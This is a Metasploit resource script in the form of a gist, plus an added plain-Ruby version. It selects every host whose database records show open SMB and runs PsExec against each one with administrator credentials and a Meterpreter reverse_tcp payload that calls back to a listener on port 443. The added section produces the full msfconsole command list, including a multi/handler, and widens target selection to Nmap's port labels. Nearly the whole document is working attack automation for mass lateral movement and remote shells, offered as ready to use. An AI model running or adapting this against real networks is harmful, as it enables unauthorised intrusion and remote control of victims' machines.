Last active May 7, 2018 00:22
Rapid-fire PSExec Metasploit resource script: selects targets by the recorded service name instead of a fixed port number
<ruby>
# Collect every host that has an open TCP service whose recorded name contains "smb",
# regardless of the port it was found on. The database iteration below is reconstructed
# (the gist's original line was lost in extraction); framework.db.workspace.services is
# the current workspace's service records.
hosts = []
framework.db.workspace.services.each do |service|
  if (service.name =~ /smb/i and service.state == 'open' and service.proto == 'tcp')
    hosts << {'ip' => service.host.address}
  end
end

# The exploit will not start its own handler, so run exploit/multi/handler for
# windows/meterpreter/reverse_tcp on LHOST:443 before launching this script.
self.run_single("set DisablePayloadHandler true")
hosts.each do |rhost|
  # 'use' first: each 'use' creates a fresh module instance, so options set before it
  # would not carry over into the module's datastore.
  self.run_single('use exploit/windows/smb/psexec')
  self.run_single("set RHOST #{rhost['ip']}")   # newer Metasploit releases name this option RHOSTS
  self.run_single('set PAYLOAD windows/meterpreter/reverse_tcp')
  self.run_single('set LHOST')                  # LHOST value is missing from the gist; set your listener address here
  self.run_single('set LPORT 443')
  self.run_single('set DisablePayloadHandler TRUE')
  self.run_single('set SMBUSER administrator')
  self.run_single('set SMBPASS leetpassword')
  self.run_single('exploit -j')
  sleep 1
end
</ruby>
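The target-selection and command-generation logic of the script as plain Ruby that runs outside msfconsole, added here as an example and not part of the gist. The service records are constructed hashes carrying the same fields the script reads (name, state, proto, port, host address); in a real resource script they come from framework.db.workspace.services. It adds two things a practitioner would want: hosts exposing SMB on several ports are attacked once rather than once per service, and the generated command list starts a multi/handler before the psexec runs, since DisablePayloadHandler leaves nothing listening on LPORT. The optional broader name pattern is an assumption about how Nmap imports label ports 139 and 445 (netbios-ssn and microsoft-ds), which the gist's /smb/i pattern would skip.

```ruby
# Added example, not code from the gist. Reproduces the script's host filter and the
# msfconsole commands it would issue, using constructed service records.
require 'set'

# Constructed sample data mimicking framework.db.workspace.services entries.
SAMPLE_SERVICES = [
  { name: 'smb',          state: 'open',   proto: 'tcp', port: 445,  host: '10.0.0.5' },
  { name: 'smb',          state: 'open',   proto: 'tcp', port: 139,  host: '10.0.0.5' },   # same host, second port
  { name: 'smb',          state: 'open',   proto: 'tcp', port: 4445, host: '10.0.0.9' },   # non-standard port
  { name: 'smb',          state: 'closed', proto: 'tcp', port: 445,  host: '10.0.0.12' },  # not open
  { name: 'microsoft-ds', state: 'open',   proto: 'tcp', port: 445,  host: '10.0.0.20' }, # Nmap label, no "smb"
  { name: 'http',         state: 'open',   proto: 'tcp', port: 80,   host: '10.0.0.9' },
  { name: 'smb',          state: 'open',   proto: 'udp', port: 445,  host: '10.0.0.30' },  # wrong protocol
]

SMB_NAME = /smb/i                                          # the gist's pattern
SMB_NAME_BROAD = /\A(smb|microsoft-ds|netbios-ssn)\z/i     # assumption: also catch Nmap's port labels

# Same predicate as the resource script (name regex, open, tcp), plus de-duplication
# so a host with SMB on 139 and 445 is returned once. Returns [{'ip' => ...}, ...].
def select_smb_hosts(services, pattern: SMB_NAME)
  seen = Set.new
  services.each_with_object([]) do |svc, hosts|
    next unless svc[:name] =~ pattern && svc[:state] == 'open' && svc[:proto] == 'tcp'
    hosts << { 'ip' => svc[:host] } if seen.add?(svc[:host])
  end
end

# Builds the msfconsole command list: a single multi/handler on lhost:lport first,
# then one psexec run per host with DisablePayloadHandler so no extra listener is started.
def psexec_commands(hosts, lhost:, lport: 443, user:, pass:)
  cmds = [
    'use exploit/multi/handler',
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'set ExitOnSession false',
    'exploit -j',
  ]
  hosts.each do |h|
    cmds.concat([
      'use exploit/windows/smb/psexec',      # 'use' before 'set', so options land in this instance
      "set RHOST #{h['ip']}",
      'set PAYLOAD windows/meterpreter/reverse_tcp',
      "set LHOST #{lhost}",
      "set LPORT #{lport}",
      'set DisablePayloadHandler true',
      "set SMBUSER #{user}",
      "set SMBPASS #{pass}",
      'exploit -j',
    ])
  end
  cmds
end

if __FILE__ == $0
  hosts = select_smb_hosts(SAMPLE_SERVICES)
  puts psexec_commands(hosts, lhost: '192.0.2.10', user: 'administrator', pass: 'leetpassword')
end
```

Running the file prints the command list; paste it into a resource file or compare it with what the <ruby> block above issues. Passing pattern: SMB_NAME_BROAD to select_smb_hosts picks up the microsoft-ds host as well.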